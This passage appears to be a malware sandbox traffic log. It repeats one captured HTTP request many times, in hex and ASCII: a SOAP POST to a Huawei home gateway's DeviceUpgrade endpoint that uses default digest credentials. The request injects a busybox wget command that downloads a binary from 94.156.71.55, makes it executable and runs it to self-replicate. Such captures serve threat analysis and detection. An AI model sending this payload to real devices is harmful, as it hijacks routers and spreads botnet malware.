HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
